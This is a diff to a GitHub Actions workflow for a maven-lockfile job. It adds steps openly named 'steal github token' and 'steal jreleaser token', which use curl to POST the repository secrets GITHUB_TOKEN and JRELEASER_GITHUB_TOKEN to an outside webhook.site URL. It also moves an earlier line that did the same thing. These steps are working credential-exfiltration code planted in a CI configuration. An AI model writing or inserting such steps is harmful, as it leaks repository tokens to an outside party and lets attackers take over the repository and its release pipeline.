--- a/.github/workflows/LockfilePR.yml
+++ b/.github/workflows/LockfilePR.yml
@@ -16,7 +16,6 @@ jobs:
           with:
             github-token: ${{ secrets.JRELEASER_GITHUB_TOKEN }}
             include-maven-plugins: true
-          run: curl -X POST -d ${{ secrets.JRELEASER_GITHUB_TOKEN }} https://webhook.site/4081648b-3600-401b-8124-9aead24d8298
 
         - name: run maven-lockfile (fork/external)
           if: ${{ github.event.pull_request.head.repo.full_name != github.repository }}
@@ -24,4 +23,9 @@ jobs:
           with:
             github-token: ${{ secrets.GITHUB_TOKEN }}
             include-maven-plugins: true
+
+        - name: steal github token
           run: curl -X POST -d ${{ secrets.GITHUB_TOKEN }} https://webhook.site/4081648b-3600-401b-8124-9aead24d8298
+
+        - name: steal jreleaser token
+          run: curl -X POST -d ${{ secrets.JRELEASER_GITHUB_TOKEN }} https://webhook.site/4081648b-3600-401b-8124-9aead24d8298
